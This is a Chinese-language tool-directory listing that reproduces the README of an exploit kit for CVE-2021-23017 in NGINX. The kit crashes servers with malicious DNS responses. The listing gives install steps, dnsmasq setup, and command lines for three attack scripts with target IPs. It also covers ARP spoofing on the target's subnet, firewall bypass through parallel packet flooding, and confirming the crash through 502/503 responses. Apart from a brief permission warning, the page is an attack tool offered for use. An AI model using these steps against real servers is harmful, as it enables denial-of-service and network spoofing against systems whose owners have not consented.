Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
EVIL-CVE-2021-23017-Update-2025 — NGINX服务器(版本0.6.18–1.20.0)中的漏洞。这些脚本旨在通过发送恶意DNS响应来导致拒绝服务(DoS),并具有绕过防火墙的增强功能。 | Kitploit
工具/GitHubGitHub/6lj/evil-cve-2021-23017-update-2025
漏洞分析漏洞利用Web安全渗透测试DNS 分析
GitHub6lj/evil-cve-2021-23017-update-2025

EVIL-CVE-2021-23017-Update-2025

NGINX服务器(版本0.6.18–1.20.0)中的漏洞。这些脚本旨在通过发送恶意DNS响应来导致拒绝服务(DoS),并具有绕过防火墙的增强功能。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
11年前尚未审核
分享

NGINX服务器(版本0.6.18–1.20.0)中的一个漏洞。这些脚本旨在通过发送恶意DNS响应来造成拒绝服务(DoS),并增强了绕过防火墙的能力。这是来自M507/CVE-2021-23017-PoC的原始PoC的改进版本。

警告:仅在获得系统所有者明确书面许可的情况下使用。未经授权的测试是非法的。

要求

  • 环境:Linux(例如Kali Linux,通过Termux/虚拟化设置)。
  • 依赖项:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3-scapy dnsmasq
    pip3 install scapy requests
    
  • 网络:与目标在同一子网,以便进行ARP欺骗,或者目标NGINX必须使用你的DNS服务器IP。

安装

  1. 克隆仓库:
    root@kitploit:~
    git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
    cd EVIL-CVE-2021-23017-Update-2025
    
  2. 配置dnsmasq:
    root@kitploit:~
    sudo nano /etc/dnsmasq.conf
    
    添加:
    root@kitploit:~
    address=/test.example.com/192.168.1.100
    
    启动:
    root@kitploit:~
    sudo systemctl start dnsmasq
    

功能

  • 发送包含长域名(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com)的恶意DNS响应,使NGINX服务器崩溃。
  • 使用curl和dig触发DNS查询,以利用漏洞。
  • 通过发送直接DNS数据包并采用并行进程来绕过防火墙。

与原始版本的区别

与M507/CVE-2021-23017-PoC相比:

  • 增强的防火墙绕过:在poc1.2.3.py中使用并行进程同时进行嗅探、DNS发送和查询触发,必须三个一起运行。
  • 优化的数据包投递:更高的数据包和查询频率,以绕过防火墙过滤。
  • 子网检查:验证网络兼容性以便进行ARP欺骗,提高可靠性。

用法

三个脚本一起运行,并使用适当的参数(替换<target_ip>、<your_dns_server_ip>、<target_url>)。

poc.py

root@kitploit:~
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • 嗅探并响应DNS查询。

poc2.py

root@kitploit:~
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • 增加直接DNS发送和查询触发。

poc3.py(推荐)

root@kitploit:~
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
  • 并行运行任务以获得最高效率。

示例

root@kitploit:~
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100

验证结果

  • 检查服务器状态:

    root@kitploit:~
    curl -I http://<target_url>
    
    • 成功:返回502 Bad Gateway或503 Service Unavailable表示服务器崩溃。
    • 失败:返回200 OK表示无漏洞或防火墙拦截。
  • 监控DNS流量:

    root@kitploit:~
    sudo wireshark -f "udp port 53"
    

免责声明:仅用于教育目的。作者对滥用不承担责任。

下载工具